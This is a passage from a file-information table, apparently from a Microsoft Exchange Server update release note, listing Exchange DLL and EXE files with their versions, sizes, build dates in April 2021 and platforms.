08:39| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.858.9| 79,752| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.858.10| 396,184| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.858.9| 21,400| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.858.10| 57,240| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.858.10| 14,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.858.10| 35,720| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.858.9| 276,352| 04-Apr-2021| 08:31| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.858.9| 16,256| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.858.10| 25,984| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.858.10| 23,448| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.858.10| 377,752| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.858.9| 83,848| 04-Apr-2021| 08:30| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.858.10| 2,971,008| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.858.10| 5,029,784| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.858.9| 893,848| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.858.10| 413,584| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.858.9| 924,552| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.858.10| 31,624| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.858.9| 52,112| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.858.10| 33,664| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.858.10| 3,515,288| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.858.9| 108,416| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.858.10| 288,648| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.858.9| 625,544| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.858.9| 86,408| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.858.9| 1,830,288| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.858.9| 466,328| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.858.10| 25,984| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.858.9| 38,288| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.858.9| 102,800| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.858.9| 48,520| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.858.9| 67,480| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.common.dll| 15.2.858.9| 172,936| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.858.9| 113,544| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.il.dll| 15.2.858.9| 13,720| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.858.9| 63,872| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.858.9| 15,248| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.common.search.dll| 15.2.858.9| 108,928| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.858.9| 51,584| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.858.9| 36,744| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.858.9| 27,512| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.858.9| 1,042,304| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.858.9| 29,072| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.858.10| 181,128| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.858.9| 30,088| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.858.9| 22,392| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.858.9| 85,912| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.compliance.dll| 15.2.858.9| 41,368| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.858.9| 37,240| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.858.10| 50,560| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.858.10| 33,176| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.858.10| 1,100,160| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.858.10| 206,744| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.858.10| 210,840| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.compression.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.858.9| 37,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.858.9| 145,800| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.858.9| 14,224| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.858.9| 53,128| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.858.9| 23,448| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.858.9| 13,208| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.858.9| 54,680| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.858.10| 1,846,152| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.858.9| 30,104| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.858.9| 68,496| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.858.9| 21,376| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.858.9| 25,984| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.858.9| 169,856| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.858.9| 330,136| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.858.9| 173,960| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.858.9| 71,048| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.858.9| 203,672| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.context.client.dll| 15.2.858.9| 27,008| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.858.9| 51,592| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.context.core.dll| 15.2.858.9| 51,080| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.858.9| 46,984| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.858.9| 1,093,520| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.858.9| 57,240| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.858.9| 326,536| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.858.9| 3,354,504| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.858.9| 35,728| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.858.9| 165,248| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.858.9| 619,384| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.858.9| 7,792,016| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.858.9| 80,280| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.data.dll| 15.2.858.9| 1,790,360| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.858.10| 1,626,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.858.9| 375,192| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.858.9| 105,352| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.858.9| 224,632| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.858.9| 186,752| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.858.9| 39,832| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.858.9| 119,176| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.858.9| 968,072| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.858.9| 141,184| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.858.9| 769,416| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.858.9| 139,640| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.858.9| 56,720| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.858.9| 453,008| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.858.9| 32,632| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.858.9| 256,912| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.858.9| 11,816,840| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.858.9| 37,768| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.858.9| 655,768| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.858.9| 175,488| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.858.9| 36,240| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.858.9| 14,224| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.858.10| 72,600| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.858.9| 13,176| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.858.9| 22,912| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.858.9| 2,213,272| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.858.9| 2,213,272| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.858.9| 23,936| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.858.9| 546,696| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.858.9| 215,416| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.858.9| 194,440| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.858.9| 146,296| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.858.9| 27,512| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.858.9| 13,696| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.858.10| 49,536| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.858.9| 28,024| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.858.9| 208,792| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.858.9| 88,984| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.858.9| 32,664| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.858.10| 45,952| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.858.10| 18,840| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.858.9| 473,464| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.858.9| 206,224| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.858.10| 36,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.858.9| 131,464| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.858.9| 21,896| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.858.9| 148,360| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.858.9| 220,032| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.858.9| 23,944| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.858.9| 97,664| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.858.9| 1,266,048| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.858.9| 1,266,048| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,508| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.858.9| 87,416| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,495| 04-Apr-2021| 08:32| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.858.9| 52,104| 04-Apr-2021| 08:33| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.858.10| 292,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.858.10| 73,112| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.858.9| 45,976| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.858.10| 218,504| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.858.9| 78,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.858.9| 35,704| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.858.10| 935,296| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.858.9| 336,264| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.858.9| 52,616| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.858.9| 32,128| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.858.9| 854,400| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.858.10| 291,736| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.858.9| 39,320| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.858.10| 76,184| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.858.10| 166,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.858.10| 1,486,736| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.858.10| 122,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.858.10| 12,327,320| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.858.9| 264,072| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.858.9| 37,760| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.858.10| 186,776| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.858.10| 64,384| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.858.10| 83,856| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.858.9| 63,864| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.858.9| 100,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.858.9| 144,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.858.10| 270,208| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.858.9| 15,760| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.858.9| 254,336| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.858.10| 37,256| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.858.9| 640,904| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.858.9| 37,272| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.858.10| 146,328| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:31| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.858.10| 595,840| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.858.10| 30,104| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.858.9| 99,720| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.858.9| 42,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.858.10| 40,344| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.858.10| 54,152| 04-Apr-2021| 08:41| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.858.9| 164,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.858.10| 58,768| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.858.9| 204,168| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.858.10| 30,600| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.858.10| 38,792| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.858.10| 48,520| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.858.9| 180,608| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.858.10| 36,736| 04-Apr-2021| 08:41| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.858.10| 25,992| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.858.10| 1,868,184| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.858.9| 54,680| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.858.10| 35,720| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.858.9| 35,736| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.858.9| 18,312| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.858.9| 18,312| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.858.9| 263,040| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.858.9| 263,040| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.858.9| 24,960| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.858.9| 24,960| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.858.9| 53,128| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.858.9| 216,960| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.858.10| 32,152| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.858.10| 281,984| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.858.10| 83,848| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.858.9| 94,088| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.858.10| 1,840,536| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.858.9| 71,552| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.858.10| 175,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.858.9| 159,616| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.858.9| 51,080| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.858.9| 32,136| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.858.9| 100,248| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.858.10| 271,248| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.858.9| 22,408| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.858.9| 33,680| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.858.9| 18,328| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.858.9| 27,536| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.858.9| 30,608| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.858.9| 22,400| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.858.9| 66,456| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.858.9| 29,592| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.858.9| 20,352| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.858.9| 34,184| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.858.9| 103,800| 04-Apr-2021| 08:31| x86 